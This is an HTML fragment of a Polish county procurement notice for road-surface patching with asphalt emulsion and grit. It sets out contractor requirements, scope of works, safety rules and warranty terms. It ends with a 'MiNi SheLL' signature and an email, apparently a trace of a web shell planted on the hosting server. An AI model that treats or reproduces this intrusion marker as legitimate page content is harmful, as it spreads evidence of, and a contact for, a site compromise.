- remonter ciśnieniowy typu Patcher wprowadzający pod ciśnieniem kruszywo jednocześnie z emulsją asfaltową bezpośrednio do uszkodzenia posiadający własne zasobniki grysu i zbiornik na emulsję asfaltową, umożliwiający oczyszczenie naprawianego miejsca sprężonym powietrzem - min 2 szt. pracujące jednocześnie o ładowności min. 7 Mg (wyklucza  się  zastosowanie innych  technologii).

Część II:
Wykonawca musi wykazać, iż posiada lub ma zapewniony dostęp (przez dzierżawę, wynajem, umowę kupna sprzedaży lub inny sposób) do niżej podanych, w pełni sprawnych jednostek sprzętu:
- remonter ciśnieniowy typu Patcher wprowadzający pod ciśnieniem kruszywo jednocześnie z emulsją asfaltową bezpośrednio do uszkodzenia posiadający własne zasobniki grysu i zbiornik na emulsję asfaltową, umożliwiający oczyszczenie naprawianego miejsca sprężonym powietrzem - min 2 szt. pracujące jednocześnie o ładowności min. 7 Mg (wyklucza  się  zastosowanie innych  technologii).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Wykonawca winien dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia:
kierownik robót -  1 osoba bez konieczności posiadania uprawnień budowlanymi.

Część II:
Wykonawca winien dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia:
kierownik robót -  1 osoba bez konieczności posiadania uprawnień budowlanymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Zamawiający odstępuje od opisu sposobu dokonywania  oceny spełniania warunków             w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału                                 w postępowaniu, o którym mowa w pkt 6.IV.1 SIWZ.

Część II:
Zamawiający odstępuje od opisu sposobu dokonywania  oceny spełniania warunków             w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału                                 w postępowaniu, o którym mowa w pkt 6.IV.1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-  wypełniony formularz ofertowy - załącznik Nr 1 do SIWZ,

-  kosztorys ofertowy - odpowiednio dla Części Nr I i dla Części Nr II,

-   wyliczenie wartości zadania oraz termin realizacji - załącznik Nr 2-2a                       (w zależności na jaką część zamówienia Wykonawca składa ofertę, tj.: załącznik Nr 2 dla Części I, załącznik Nr 2a dla Części II);

-  w przypadku wystąpienia podwykonawców, wykaz prac które zamierza się powierzyć podwykonawcom (nie przedłożenie w ofercie przedmiotowego wykazu będzie oznaczało, że Wykonawca planuje samodzielne wykonanie całego zakresu robót budowlanych) - załącznik Nr 10 do SIWZ dla Części I, załącznik Nr 10a             do SIWZ dla Części II;

- w przypadku występowania kilku podmiotów pisemne pełnomocnictwo Wykonawców do reprezentowania ich w postępowaniu. Wykonawcy ustalają  pełnomocnika do reprezentowania ich w postępowaniu w formie pisemnego pełnomocnictwa (art. 23 ustawy Pzp),

- w przypadku występowania pełnomocnika, pełnomocnictwo do podpisania oferty (np. gdy w imieniu wykonawcy występuje inna osoba), 

- zobowiązanie podmiotu trzeciego do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (w przypadku wystąpienia takiej sytuacji).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian zawarte są w projektach umów będących załącznikami do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatstrzelecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Strzelcach Opolskich  przy ul. Jordanowskiej 2, 47-100 Strzelce Opolskie, w pokoju nr 207 - II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2016 godzina 10:00, miejsce: Starostwo Powiatowe w Strzelcach Opolskich  przy ul. Jordanowskiej 2, 47-100 Strzelce Opolskie, w pokoju nr 201 -KANCELARIA  II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy nawierzchni bitumicznych dróg powiatowych                     Powiatu Strzeleckiego emulsją asfaltową i grysami - część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu cząstkowego nawierzchni bitumicznych przy użyciu grysów bazaltowych lub granitowych i kationowej emulsji asfaltowej szybko rozpadowej            K1-70 niemodyfikowanej na drogach powiatowych Powiatu Strzeleckiego. Zamówienie obejmuje wbudowanie łącznie 700 Mg materiału (grysu + emulsji) w ubytki nawierzchni dróg - w tym dróg miejskich oraz zamiejskich.

Zamówienie zostało podzielone na dwie części:
a)	Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami - część I
Część I (gm. Ujazd, gm. Leśnica, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 370 Mg materiału:
-	Etap I - wbudowanie 250 Mg materiału;
-	Etap II - wbudowanie 120 Mg materiału;
b)	Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami - część II
Część II (gm. Jemielnica, gm. Kolonowskie, gm. Zawadzkie, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 330 Mg materiału:
-	Etap I - wbudowanie 230 Mg materiału;
-	Etap II - wbudowanie 100 Mg materiału;

Zamawiający dopuszcza składania ofert częściowych. 


Część Nr I: Remont cząstkowy nawierzchni bitumicznych dróg powiatowych                     Powiatu Strzeleckiego emulsją asfaltową i grysami - część I.

Część I (gm. Ujazd, gm. Leśnica, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 370 Mg materiału:
-	Etap I - wbudowanie 250 Mg materiału;
-	Etap II - wbudowanie 120 Mg materiału;

Zakres robót:
a)	oczyszczenie remontowanego miejsca sprężonym powietrzem z kurzu, luźnej ziemi i błota - (w przypadku mocnego zabrudzenia skropienie wodą i wydmuchanie błota)
b)	spryskanie emulsją asfaltową dna i krawędzi remontowanego miejsca
c)	wbudowanie pod wysokim ciśnieniem mieszanki grysu bazaltowego o frakcji w zależności od głębokości i powierzchni remontowanego miejsca z emulsją asfaltową
d)	wbudowanie pod wysokim ciśnieniem mieszanki warstwy ścieralnej
e)	zasypanie pod ciśnieniem remontowanego miejsca suchym grysem frakcji 2/5 mm
f)	zamiatanie - usunięcie luźnych grysów na terenie zabudowanym przy krawężniku.

Informacje dodatkowe:
1)	Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową. Teren robót należy oznakować znakami A-14 roboty drogowe, B-33 ograniczenie prędkości i A-28 sypki żwir wraz z prawidłowym oznakowaniem pojazdu                    oraz zgodnie z zatwierdzonym projektem organizacji ruchu. Przedmiotowe oznakowanie tymczasowe związane z wykonywanymi robotami może zostać zdemontowane przez Wykonawcę wyłącznie w przypadku stwierdzenia, że luźny grys użyty w ramach robót nie zalega na jezdni, a tym samym droga może                    być użytkowana w sposób bezpieczny. Koszt wykonania projektu organizacji ruchu oraz oznakowania prac nie podlega odrębnej zapłacie i przyjmuje się, że jest włączony w cenę oferty.



2)	Zamawiający wymaga, aby zamówienie było realizowane co najmniej dwoma  remonterami jednocześnie - dotyczy zarówno części I jak i części II. Całkowicie  wyklucza  się   zastosowanie  innych  technologii. Wykonawca musi wykazać, że dysponuje lub będzie dysponował w/w sprzętem.
3)	Zamawiający wymaga, aby codzienne ważenie samochodów wraz z materiałem zarówno przed rozpoczęciem robót jak i po ich zakończeniu odbywało się na terenie Powiatu Strzeleckiego. Koszt wykonania ważenia nie podlega odrębnej zapłacie                 i przyjmuje się, że jest włączony w cenę oferty. Zamawiający ma prawo uczestniczyć podczas ważenia samochodu. Wykonawca będzie również dostarczał Zamawiającemu codziennie dokumenty z przeważenia samochodu.
4)	Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu robót i jego otoczenia,               a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.

Niezależnie od zakresu robót ujętego przedmiarem robót, wynagrodzenie ustalone                   w ofercie Wykonawcy  musi zawierać wszelkie koszty związane z:
1)	doprowadzeniem terenu po wykonaniu  robót do stanu pierwotnego,
2)	organizacją placu robót,
3)	ubezpieczeniem zadania,
4)	zabezpieczeniem robót pod  względem BHP.

Środki techniczne i organizacyjne zabezpieczające budowę oraz instruktaż pracowników przed rozpoczęciem budowy:
1)	W trakcie wykonywania robot należy stosować warunki techniczne wykonania robot, przepisy szczególne, normy itp.
2)	Roboty drogowe powinny być prowadzone pod nadzorem brygadzisty, który ma obowiązek organizowania, przygotowania i kierowania pracami brygady w sposób zabezpieczający przed wypadkiem zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
3)	Strefy niebezpieczne (miejsca niebezpieczne) należy odpowiednio oznakować                 i ogrodzić.
4)	Na placu budowy winny być wyznaczone miejsca składowania materiałów, winny być wykonane w sposób zabezpieczający przed możliwością wywrócenia, zsunięcia lub rozsunięcia.
5)	Technologia wykonania robót drogowych zgodnie z wymaganiami i wytycznymi poszczególnych rodzajów robót.
6)	Instruktaż bhp na stanowiskach pracy oraz o systemie powiadomienia                         przy zaistnieniu wypadku.
7)	W przypadku wystąpienia podwykonawców generalny wykonawca obowiązany jest do:
a)	pełnienia bezpośredniego nadzoru nad przestrzeganiem przepisów bezpieczeństwa i higieny pracy,
b)	egzekwowania od podwykonawców przestrzegania przepisów bezpiecznej pracy,
c)	określenia współpracy ze sobą wszystkich podwykonawców,
d)	wyznaczenia koordynatora sprawującego nadzór nad bezpieczeństwem                 i higieną pracy wszystkich pracowników,
e)	ustalenia zasad współdziałania w zakresie sposobów postępowania przy wystąpieniu zagrożeń dla zdrowia lub życia pracowników.
8)	Przed przystąpieniem do wykonywania robót drogowych należy opracować projekt organizacji ruchu drogowego na czas robót. Projekt musi przewidywać możliwość dojazdu na budowę i do przyległych zabudowań w przypadku pożaru, czy potrzeby niesienia pomocy. 
9)	Roboty prowadzić tylko przy oznakowaniu robót zgodnie z w/w projektem, zatwierdzonym przez organ zarządzający ruchem drogowym.
10)	Poinformować zainteresowane przedsiębiorstwa i instytucje oraz okolicznych mieszkańców o rozpoczęciu robót i związanych z tym utrudnieniach.
11)	W rejonie istniejącego uzbrojenia roboty należy prowadzić ręcznie i pod nadzorem użytkownika.
12)	Przy realizacji robót stosować standardowe zasady zabezpieczenia pracowników,  w tym środki ochrony osobistej.
13)	Maszyny i urządzenia techniczne oraz narzędzia zmechanizowane powinny                   być monitorowane, eksploatowane i obsługiwane zgodnie z instrukcją producenta.
14)	Maszyny i urządzenia techniczne podlegające dozorowi technicznemu muszą mieć dokumenty uprawniające do ich eksploatacji.
15)	Operatorzy maszyn powinni posiadać odpowiednie kwalifikacje.
16)	Wykonawca jest zobowiązany do ochrony przed uszkodzeniem lub zniszczeniem własności publicznej lub prywatnej. Jeżeli w związku z zaniedbaniem, niewłaściwym prowadzeniem robót lub brakiem koniecznych działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności publicznej lub prywatnej, to Wykonawca            na swój koszt naprawi lub odtworzy uszkodzoną własność. Stan naprawionej własności powinien być nie gorszy niż przed powstaniem uszkodzenia.

17)	W warunkach ograniczonej widoczności miejsca prowadzenia prac powinny                   być właściwie oświetlone.
Warunki gwarancyjne.
Wykonawca zobowiązany będzie udzielić na całość wykonanego przedmiotu zamówienia gwarancji, na opisanych poniżej warunkach.
1. Wykonawca udziela Zamawiającemu gwarancji na przedmiot umowy na okres                           24 miesięcy (licząc od daty przekazania przez Wykonawcę zamówienia i przyjęcia przez Zamawiającego jako należycie wykonanego).
2. Bieg okresu gwarancji i rękojmi rozpoczyna się:
a) w dniu następnym licząc od daty odbioru końcowego,
b) dla wymienianych materiałów wbudowanych w ramach umowy z dniem ich wymiany.
3. Zamawiający może dochodzić roszczeń z tytułu gwarancji na zasadach przewidzianych             w ustępach poprzedzających, także po okresie określonym w ust. 1, jeżeli zgłosił wadę przed upływem tego okresu.
4. Jeżeli Wykonawca nie usunie wad w terminie uzgodnionym z Zamawiającym,                                     to Zamawiający może zlecić usunięcie ich osobie trzeciej na koszt Wykonawcy. W tym przypadku koszty usuwania wad będą pokrywane w pierwszej kolejności z zatrzymanej kwoty będącej zabezpieczeniem należytego wykonania umowy.  
5. Wykonawca najpóźniej w dniu podpisania umowy przekaże Zamawiającemu kartę gwarancyjną, zawierającą wszystkie warunki określone powyżej.

Zamawiający dopuszcza udzielenie Wykonawcy zamówień uzupełniających w trybie zamówienia         z wolnej ręki stanowiących nie więcej niż 50 % wartości zamówienia podstawowego dla części I.          

Zamawiający nie dopuszcza składania ofert wariantowych.

Nie zamierza się ustanawiać dynamicznego systemu zakupów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy nawierzchni bitumicznych dróg powiatowych                       Powiatu Strzeleckiego emulsją asfaltową i grysami - część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu cząstkowego nawierzchni bitumicznych przy użyciu grysów bazaltowych lub granitowych i kationowej emulsji asfaltowej szybko rozpadowej            K1-70 niemodyfikowanej na drogach powiatowych Powiatu Strzeleckiego. Zamówienie obejmuje wbudowanie łącznie 700 Mg materiału (grysu + emulsji) w ubytki nawierzchni dróg - w tym dróg miejskich oraz zamiejskich.

Zamówienie zostało podzielone na dwie części:
a)	Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami - część I
Część I (gm. Ujazd, gm. Leśnica, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 370 Mg materiału:
-	Etap I - wbudowanie 250 Mg materiału;
-	Etap II - wbudowanie 120 Mg materiału;
b)	Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami - część II
Część II (gm. Jemielnica, gm. Kolonowskie, gm. Zawadzkie, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 330 Mg materiału:
-	Etap I - wbudowanie 230 Mg materiału;
-	Etap II - wbudowanie 100 Mg materiału;

Zamawiający dopuszcza składania ofert częściowych. 
Część Nr II: Remont cząstkowy nawierzchni bitumicznych dróg powiatowych                       Powiatu Strzeleckiego emulsją asfaltową i grysami - część II.

Część II (gm. Jemielnica, gm. Kolonowskie, gm. Zawadzkie, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 330 Mg materiału:
-	Etap I - wbudowanie 230 Mg materiału;
-	Etap II - wbudowanie 100 Mg materiału;

Zakres robót:
a)	oczyszczenie remontowanego miejsca sprężonym powietrzem z kurzu, luźnej ziemi i błota - (w przypadku mocnego zabrudzenia skropienie wodą i wydmuchanie błota)
b)	spryskanie emulsją asfaltową dna i krawędzi remontowanego miejsca
c)	wbudowanie pod wysokim ciśnieniem mieszanki grysu bazaltowego o frakcji w zależności od głębokości i powierzchni remontowanego miejsca z emulsją asfaltową
d)	wbudowanie pod wysokim ciśnieniem mieszanki warstwy ścieralnej
e)	zasypanie pod ciśnieniem remontowanego miejsca suchym grysem frakcji 2/5 mm
f)	zamiatanie - usunięcie luźnych grysów na terenie zabudowanym przy krawężniku.






Informacje dodatkowe:
1)	Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową. Teren robót należy oznakować znakami A-14 roboty drogowe, B-33 ograniczenie prędkości i A-28 sypki żwir wraz z prawidłowym oznakowaniem pojazdu                    oraz zgodnie z zatwierdzonym projektem organizacji ruchu. Przedmiotowe oznakowanie tymczasowe związane z wykonywanymi robotami może zostać zdemontowane przez Wykonawcę wyłącznie w przypadku stwierdzenia, że luźny grys użyty w ramach robót nie zalega na jezdni, a tym samym droga może                    być użytkowana w sposób bezpieczny. Koszt wykonania projektu organizacji ruchu oraz oznakowania prac nie podlega odrębnej zapłacie i przyjmuje się,                           że jest włączony w cenę oferty.
2)	Zamawiający wymaga, aby zamówienie było realizowane co najmniej dwoma  remonterami jednocześnie - dotyczy zarówno części I jak i części II. Całkowicie  wyklucza  się   zastosowanie  innych  technologii. Wykonawca musi wykazać, że dysponuje lub będzie dysponował w/w sprzętem.
3)	Zamawiający wymaga, aby codzienne ważenie samochodów wraz z materiałem zarówno przed rozpoczęciem robót jak i po ich zakończeniu odbywało się na terenie Powiatu Strzeleckiego. Koszt wykonania ważenia nie podlega odrębnej zapłacie                 i przyjmuje się, że jest włączony w cenę oferty. Zamawiający ma prawo uczestniczyć podczas ważenia samochodu. Wykonawca będzie również dostarczał Zamawiającemu codziennie dokumenty z przeważenia samochodu.
4)	Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu robót i jego otoczenia,               a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.

Niezależnie od zakresu robót ujętego przedmiarem robót, wynagrodzenie ustalone                   w ofercie Wykonawcy  musi zawierać wszelkie koszty związane z:
1)	doprowadzeniem terenu po wykonaniu  robót do stanu pierwotnego,
2)	organizacją placu robót,
3)	ubezpieczeniem zadania,
4)	zabezpieczeniem robót pod  względem BHP.




Środki techniczne i organizacyjne zabezpieczające budowę oraz instruktaż pracowników przed rozpoczęciem budowy:
1) W trakcie wykonywania robot należy stosować warunki techniczne wykonania robot, przepisy szczególne, normy itp.
2) Roboty drogowe powinny być prowadzone pod nadzorem brygadzisty, który ma obowiązek organizowania, przygotowania i kierowania pracami brygady w sposób zabezpieczający przed wypadkiem zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
3) Strefy niebezpieczne (miejsca niebezpieczne) należy odpowiednio oznakować i ogrodzić.
4) Na placu budowy winny być wyznaczone miejsca składowania materiałów, winny być wykonane w sposób zabezpieczający przed możliwością wywrócenia, zsunięcia lub rozsunięcia.
5) Technologia wykonania robót drogowych zgodnie z wymaganiami i wytycznymi poszczególnych rodzajów robót.
6) Instruktaż bhp na stanowiskach pracy oraz o systemie powiadomienia przy zaistnieniu wypadku.
7) W przypadku wystąpienia podwykonawców generalny wykonawca obowiązany jest do:
a) pełnienia bezpośredniego nadzoru nad przestrzeganiem przepisów bezpieczeństwa i higieny pracy,
b) egzekwowania od podwykonawców przestrzegania przepisów bezpiecznej pracy,
c) określenia współpracy ze sobą wszystkich podwykonawców,
d) wyznaczenia koordynatora sprawującego nadzór nad bezpieczeństwem i higieną pracy wszystkich pracowników,
e) ustalenia zasad współdziałania w zakresie sposobów postępowania przy wystąpieniu zagrożeń dla zdrowia lub życia pracowników.
8) Przed przystąpieniem do wykonywania robót drogowych należy opracować projekt organizacji ruchu drogowego na czas robót. Projekt musi przewidywać możliwość dojazdu na budowę                        i do przyległych zabudowań w przypadku pożaru, czy potrzeby niesienia pomocy. 
9) Roboty prowadzić tylko przy oznakowaniu robót zgodnie z w/w projektem, zatwierdzonym przez organ zarządzający ruchem drogowym.
10) Poinformować zainteresowane przedsiębiorstwa i instytucje oraz okolicznych mieszkańców              o rozpoczęciu robót i związanych z tym utrudnieniach.
11) W rejonie istniejącego uzbrojenia roboty należy prowadzić ręcznie i pod nadzorem użytkownika.
12) Przy realizacji robót stosować standardowe zasady zabezpieczenia pracowników,                         w tym środki ochrony osobistej.
13) Maszyny i urządzenia techniczne oraz narzędzia zmechanizowane powinny być monitorowane, eksploatowane i obsługiwane zgodnie z instrukcją producenta.
14) Maszyny i urządzenia techniczne podlegające dozorowi technicznemu muszą mieć dokumenty uprawniające do ich eksploatacji.
15) Operatorzy maszyn powinni posiadać odpowiednie kwalifikacje.
16) Wykonawca jest zobowiązany do ochrony przed uszkodzeniem lub zniszczeniem własności publicznej lub prywatnej. Jeżeli w związku z zaniedbaniem, niewłaściwym prowadzeniem robót   lub brakiem koniecznych działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności publicznej lub prywatnej, to Wykonawca na swój koszt naprawi lub odtworzy uszkodzoną własność. Stan naprawionej własności powinien być nie gorszy niż przed powstaniem uszkodzenia.
17) W warunkach ograniczonej widoczności miejsca prowadzenia prac powinny być właściwie oświetlone.

Warunki gwarancyjne.
Wykonawca zobowiązany będzie udzielić na całość wykonanego przedmiotu zamówienia gwarancji, na opisanych poniżej warunkach.
1. Wykonawca udziela Zamawiającemu gwarancji na przedmiot umowy na okres                           24 miesięcy (licząc od daty przekazania przez Wykonawcę zamówienia i przyjęcia                    przez Zamawiającego jako należycie wykonanego).
2. Bieg okresu gwarancji i rękojmi rozpoczyna się:
a) w dniu następnym licząc od daty odbioru końcowego,
b) dla wymienianych materiałów wbudowanych w ramach umowy z dniem ich wymiany.
3. Zamawiający może dochodzić roszczeń z tytułu gwarancji na zasadach przewidzianych             w ustępach poprzedzających, także po okresie określonym w ust. 1, jeżeli zgłosił wadę przed upływem tego okresu.
4. Jeżeli Wykonawca nie usunie wad w terminie uzgodnionym z Zamawiającym,                                     to Zamawiający może zlecić usunięcie ich osobie trzeciej na koszt Wykonawcy.                         W tym przypadku koszty usuwania wad będą pokrywane w pierwszej kolejności z zatrzymanej kwoty będącej zabezpieczeniem należytego wykonania umowy.  
5. Wykonawca najpóźniej w dniu podpisania umowy przekaże Zamawiającemu kartę gwarancyjną, zawierającą wszystkie warunki określone powyżej.

Zamawiający dopuszcza udzielenie Wykonawcy zamówień uzupełniających w trybie zamówienia         z wolnej ręki stanowiących nie więcej niż 50 % wartości zamówienia podstawowego dla części II.          

Zamawiający nie dopuszcza składania ofert wariantowych.

Nie zamierza się ustanawiać dynamicznego systemu zakupów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com